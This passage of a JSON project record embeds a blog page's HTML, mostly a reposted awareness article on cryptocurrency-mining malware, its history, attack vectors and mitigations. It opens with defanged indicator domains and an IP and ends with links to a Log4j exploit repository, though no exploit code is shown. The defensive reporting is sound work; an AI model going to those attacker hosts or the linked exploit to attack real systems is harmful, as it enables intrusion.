These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp class=\"has-medium-font-size\"\u003eSecurity 101: The Impact of Cryptocurrency-Mining Malware\u003c/p\u003e\n\n\n\n\u003cp\u003eThe Australian government has just\u0026nbsp;\u003ca href=\"http://www.budget.gov.au/2017-18/content/glossies/factsheets/html/FS_innovation.htm\"\u003erecognized\u003c/a\u003e\u0026nbsp;digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms.\u003c/p\u003e\n\n\n\n\u003cp\u003eJapan, which\u0026nbsp;\u003ca href=\"http://www.businessinsider.com/bitcoin-price-spikes-as-japan-recognizes-it-as-a-legal-payment-method-2017-4\"\u003elegitimized\u003c/a\u003e\u0026nbsp;bitcoin as a form of payment last April, already\u0026nbsp;\u003ca href=\"http://asia.nikkei.com/Business/Trends/Bitcoin-seen-spreading-to-20-000-Japanese-merchants\"\u003eexpects\u003c/a\u003e\u0026nbsp;more than 20,000 merchants to accept bitcoin payments. 
Other countries are joining the bandwagon, albeit partially:\u0026nbsp;\u003ca href=\"http://www.ey.com/ch/en/newsroom/news-releases/news-release-ey-switzerland-accepts-bitcoins-for-payment-of-its-services\"\u003ebusinesses\u003c/a\u003e\u0026nbsp;and some of the\u0026nbsp;\u003ca href=\"http://www.reuters.com/article/us-swiss-fintech-cryptovalley-idUSKCN11E0L9\"\u003epublic organizations\u003c/a\u003e\u0026nbsp;in Switzerland,\u0026nbsp;\u003ca href=\"https://news.bitcoin.com/the-libertarian-city-liberstad-in-norway-is-moving-forward-using-bitcoin-as-primary-currency/\"\u003eNorway\u003c/a\u003e, and the\u0026nbsp;\u003ca href=\"https://www.technologyreview.com/s/534011/a-weekend-in-bitcoin-city-arnhem-the-netherlands/\"\u003eNetherlands\u003c/a\u003e. In a recent\u0026nbsp;\u003ca href=\"https://www.jbs.cam.ac.uk/fileadmin/user_upload/research/centres/alternative-finance/downloads/2017-global-cryptocurrency-benchmarking-study.pdf\"\u003estudy\u003c/a\u003e, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eBut what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users?\u003c/p\u003e\n\n\n\n\u003ch2\u003eWhat is cryptocurrency?\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrency is an encrypted data string that denotes a unit of currency. It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. 
Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency.\u003c/p\u003e\n\n\n\n\u003ch2\u003eBitcoin isn’t the be-all and end-all\u003c/h2\u003e\n\n\n\n\u003cp\u003eThere are actually\u0026nbsp;\u003ca href=\"https://coinmarketcap.com/currencies/views/all/\"\u003eover 700 cryptocurrencies\u003c/a\u003e, but only some are readily traded and even fewer have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcast, validated, and registered in a public, distributed database through a network of communication endpoints (nodes).\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eWhile bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. 
Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eEthereum, however, earned notoriety after a hacker\u0026nbsp;\u003ca href=\"https://www.wired.com/2016/06/50-million-hack-just-showed-dao-human/\"\u003eexploited\u003c/a\u003e\u0026nbsp;a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based on the original blockchain, and Ethereum, its upgraded version (via a hard fork).\u003c/p\u003e\n\n\n\n\u003cp\u003eThere are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero. Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units as Bitcoin issues. Monero is notable for its use of ring signatures (a type of digital signature) and the CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency mining also drew cybercriminal attention\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. 
Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eUnfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/ransomware\"\u003eransomware\u003c/a\u003e\u0026nbsp;operators showed. The increasing popularity of cryptocurrencies coincides with the incidence of malware that infects systems and devices, turning them into armies of cryptocurrency-mining machines.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment in the hardware, not to mention the electricity costs to power it.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved. Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power\u0026nbsp;\u003ca href=\"https://bitcoin.org/en/developer-guide#proof-of-work\"\u003eincreases\u003c/a\u003e, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was\u0026nbsp;\u003ca href=\"http://www.reuters.com/article/us-markets-bitcoin-mining-idUSKCN0ZO2CW\"\u003ehalved\u003c/a\u003e\u0026nbsp;to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. 
Profit is divided among the group, depending on how much effort a miner exerted.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency-mining malware use similar attack vectors\u003c/h2\u003e\n\n\n\n\u003cp\u003eBad guys turn to using malware to skirt around these challenges. There is, however, a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/botnet\"\u003ebotnets\u003c/a\u003e\u0026nbsp;of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was\u0026nbsp;\u003ca href=\"http://www.thecrimson.com/article/2014/2/20/harvard-odyssey-dogecoin/\"\u003eused to illicitly mine dogecoins\u003c/a\u003e. During the same year, a similar\u0026nbsp;\u003ca href=\"http://www.bbc.com/news/technology-27779030\"\u003eincident\u003c/a\u003e\u0026nbsp;happened to the US National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was\u0026nbsp;\u003ca href=\"http://www.ibtimes.com/bitcoin-mining-employee-federal-reserve-fined-suspended-using-government-server-mine-2484185\"\u003emisused to mine for bitcoins\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). 
In January 2014, a\u0026nbsp;\u003ca href=\"http://www.bbc.com/news/technology-25653664\"\u003evulnerability in Yahoo!’s Java-based advertisement network was compromised\u003c/a\u003e, exposing European end users to\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/malvertisement\"\u003emalvertisements\u003c/a\u003e\u0026nbsp;that delivered a bitcoin-mining malware. A month before it, German law enforcement\u0026nbsp;\u003ca href=\"https://www.scmagazine.com/german-police-arrest-bitcoin-hackers/article/543183/\"\u003earrested\u003c/a\u003e\u0026nbsp;hackers for purportedly using malware to mine over $954,000 worth of bitcoins.\u003c/p\u003e\n\n\n\n\u003cp\u003eWe’ve seen the\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/threat-encyclopedia/web-attack/93/cybercriminals-unleash-bitcoinmining-malware\"\u003eemergence of hacking tools and backdoors related to cybercriminal bitcoin mining\u003c/a\u003e\u0026nbsp;as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/bitcoin-mining-botnet-found-with-ddos-capabilities/\"\u003edistributed denial-of-service\u003c/a\u003e\u0026nbsp;and\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-links-on-twitter-lead-to-bitcoin-mining/\"\u003eURL spoofing\u003c/a\u003e. Another even tried to\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/trojan-disguised-as-trend-micro-component-drops-bitcoin-mining-malware/\"\u003emasquerade as a component for one of Trend Micro’s products\u003c/a\u003e. 
In 2014, the threat\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-malware-mines-dogecoins-and-litecoins-for-bitcoin-payout/\"\u003ecrossed over to Android devices as Kagecoin\u003c/a\u003e, capable of mining bitcoin, litecoin, and dogecoin. A\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/\"\u003eremote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground\u003c/a\u003e\u0026nbsp;was modified to add bitcoin-mining functionality. The same was done to an old\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/old-java-rat-updates-includes-litecoin-plugin/\"\u003eJava RAT that can mine litecoin\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eThis year’s notable cryptocurrency-mining malware so far are\u0026nbsp;\u003ca href=\"https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar\"\u003eAdylkuzz\u003c/a\u003e, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities.\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/wannacry-uiwix-ransomware-monero-mining-malware-follow-suit/\"\u003eAdylkuzz leverages EternalBlue\u003c/a\u003e, the same security flaw that\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/massive-wannacrywcry-ransomware-attack-hits-various-countries/\"\u003eWannaCry\u003c/a\u003e\u0026nbsp;ransomware\u0026nbsp;used to destructive effect, while CPUMiner/EternalMiner used\u0026nbsp;\u003ca href=\"http://www.securityweek.com/sambacry-flaw-exploited-deliver-cryptocurrency-miner\"\u003eSambaCry\u003c/a\u003e, a vulnerability in interoperability software suite Samba. 
Linux.MulDrop.14, a Linux Trojan,\u0026nbsp;\u003ca href=\"http://www.zdnet.com/article/linux-malware-enslaves-raspberry-pi-to-mine-cryptocurrency/\"\u003etargets\u003c/a\u003e\u0026nbsp;Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency-mining malware’s impact makes them a credible threat\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eBut we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector. 
The most prevalent of these attacks we saw were:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/cross-site-scripting-(xss)\"\u003eCross-site scripting\u003c/a\u003e\u003c/li\u003e\n\n\n\n\u003cli\u003eExploiting a remote code execution\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/iis-6-0-vulnerability-leads-code-execution/\"\u003evulnerability in Microsoft’s Internet Information Server\u003c/a\u003e\u0026nbsp;(IIS)\u003c/li\u003e\n\n\n\n\u003cli\u003eBrute force and default password logins/attacks\u003c/li\u003e\n\n\n\n\u003cli\u003eCommand buffer overflow exploits\u003c/li\u003e\n\n\n\n\u003cli\u003eHypertext Preprocessor (PHP) arbitrary code injection\u003c/li\u003e\n\n\n\n\u003cli\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/sql-injection\"\u003eSQL injection\u003c/a\u003e\u003c/li\u003e\n\n\n\n\u003cli\u003eBlackNurse\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/denial-of-service-(dos)\"\u003edenial of service\u003c/a\u003e\u0026nbsp;attack\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eThese malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. 
These attacks can also be the conduit from which additional malware are delivered.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/threat-intelligence-center/internet-of-things/\"\u003eInternet of Things\u003c/a\u003e\u0026nbsp;(IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from\u0026nbsp;\u003ca href=\"https://arstechnica.com/security/2014/05/infecting-dvrs-with-bitcoin-mining-malware-even-easier-you-suspected/\"\u003edigital video recorders\u003c/a\u003e\u0026nbsp;(DVRs)/surveillance cameras,\u0026nbsp;\u003ca href=\"https://www.wired.com/2014/01/spime-watch-linux-darlloz-internet-things-worm/\"\u003eset-top boxes\u003c/a\u003e,\u0026nbsp;\u003ca href=\"http://www.computerworld.com/article/3119109/security/thousands-of-seagate-nas-boxes-host-cryptocurrency-mining-malware.html\"\u003enetwork-attached storage\u003c/a\u003e\u0026nbsp;(NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai\u0026nbsp;\u003ca href=\"http://www.newsweek.com/botnet-hacking-devices-mine-bitcoin-582404\"\u003esurfaced\u003c/a\u003e\u0026nbsp;with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cyber-attacks/a-rundown-of-the-biggest-cybersecurity-incidents-of-2016#WorstTroublemakerMirai\"\u003eknock high-profile sites offline\u003c/a\u003e\u0026nbsp;last year. 
Over the first three quarters of 2016, we detected a\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/home-routers-mitigating-attacks-that-turn-them-to-zombies/\"\u003ebitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eFrom January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eWhile bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent. We found that machines running Windows had the most bitcoin mining activities, but also of note are:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eSystems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7)\u003c/li\u003e\n\n\n\n\u003cli\u003eDevices run on Ubuntu OS, a derivative of Debian Linux OS\u003c/li\u003e\n\n\n\n\u003cli\u003eHome routers\u003c/li\u003e\n\n\n\n\u003cli\u003eEnvironment-monitoring devices, used in data centers\u003c/li\u003e\n\n\n\n\u003cli\u003eAndroid-run smart TVs and mobile devices\u003c/li\u003e\n\n\n\n\u003cli\u003eIP cameras\u003c/li\u003e\n\n\n\n\u003cli\u003ePrint servers\u003c/li\u003e\n\n\n\n\u003cli\u003eGaming consoles\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e[READ:\u0026nbsp;\u003c/strong\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/internet-of-things/securing-routers-against-mirai-home-network-attacks\"\u003e\u003cstrong\u003eHow to secure your router against Mirai and home network attacks\u003c/strong\u003e\u003c/a\u003e\u003cstrong\u003e]\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency-mining malware can make 
victims a part of the problem\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrency-mining malware can impair system performance and expose end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eIndeed, their adverse impact on the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eRegularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems\u003c/li\u003e\n\n\n\n\u003cli\u003eChanging or strengthening the device’s default credentials makes the device less prone to unauthorized access\u003c/li\u003e\n\n\n\n\u003cli\u003eEnabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts\u003c/li\u003e\n\n\n\n\u003cli\u003eTaking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eIT/system administrators and information security professionals can also consider\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint/endpoint-application-control.html\"\u003eapplication whitelisting\u003c/a\u003e\u0026nbsp;or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. 
Applying the principle of least privilege, developing\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cybercrime-and-digital-threats/infosec-guide-web-injections\"\u003ecountermeasures against web injections\u003c/a\u003e,\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cybercrime-and-digital-threats/infosec-guide-email-threats\"\u003esecuring the email gateway\u003c/a\u003e,\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cybercrime-and-digital-threats/infosec-guide-email-threats\"\u003eimplementing best practices for corporate mobile devices\u003c/a\u003e, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/\"\u003evital roles in securing the ecosystems\u003c/a\u003e\u0026nbsp;they run in.\u003c/p\u003e\n\n\n\u003cdiv class=\"wp-block-image\"\u003e\n\u003cfigure class=\"aligncenter size-full\"\u003e\u003ca href=\"https://cryptodeeptech.ru/blockchain-attack-vectors/\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003cimg decoding=\"async\" loading=\"lazy\" width=\"972\" height=\"195\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/image-68.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1652\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-68.png 972w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-68-300x60.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-68-768x154.png 768w\" 
sizes=\"(max-width: 972px) 100vw, 972px\"\u003e\u003c/a\u003e\u003cfigcaption class=\"wp-element-caption\"\u003e\u003ca href=\"https://cryptodeeptech.ru/blockchain-attack-vectors/\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003ccode\u003ehttps://cryptodeeptech.ru/blockchain-attack-vectors/\u003c/code\u003e\u003c/a\u003e\u003c/figcaption\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch2 class=\"has-text-align-center\"\u003eMajority is not Enough: Bitcoin Mining is Vulnerable\u003c/h2\u003e\n\n\n\u003cdiv class=\"wp-block-image\"\u003e\n\u003cfigure class=\"aligncenter size-full\"\u003e\u003ca href=\"https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003cimg decoding=\"async\" loading=\"lazy\" width=\"960\" height=\"655\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/image-67.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1649\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-67.png 960w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-67-300x205.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2022/12/image-67-768x524.png 768w\" sizes=\"(max-width: 960px) 100vw, 960px\"\u003e\u003c/a\u003e\u003cfigcaption class=\"wp-element-caption\"\u003e\u003ca href=\"https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003ccode\u003ehttps://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf\u003c/code\u003e\u003c/a\u003e\u003c/figcaption\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e\u003ca 
href=\"https://github.com/demining/Log4j-Vulnerability\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eGitHub\u003c/a\u003e\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://t.me/cryptodeeptech\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eTelegram:\u0026nbsp;https://t.me/cryptodeeptech\u003c/a\u003e\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003ca href=\"https://youtu.be/PNDBjoT83zA\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003cstrong\u003eVideo: https://youtu.be/PNDBjoT83zA\u003c/strong\u003e\u003c/a\u003e\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://cryptodeeptech.ru/log4j-vulnerability\" target=\"_blank\" rel=\"noreferrer noopener\"\u003eSource: https://cryptodeeptech.ru/log4j-vulnerability\u003c/a\u003e\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\u003cdiv class=\"wp-block-image\"\u003e\n\u003cfigure class=\"aligncenter size-large\"\u003e\u003cimg decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"576\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/032-1-1024x576.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" class=\"wp-image-1874\" srcset=\"https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1-1024x576.png 1024w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1-300x169.png 300w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1-768x432.png 768w, https://cryptodeeptech.ru/wp-content/uploads/2023/01/032-1.png 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\"\u003e\u003c/figure\u003e\u003c/div\u003e\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp\u003e\u003c/p\u003e\n\t\u003c/div\u003e\u003c!-- .entry-content 
--\u003e\n\n\t\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemining%2Flog4j-vulnerability","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdemining%2Flog4j-vulnerability","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdemining%2Flog4j-vulnerability/lists"}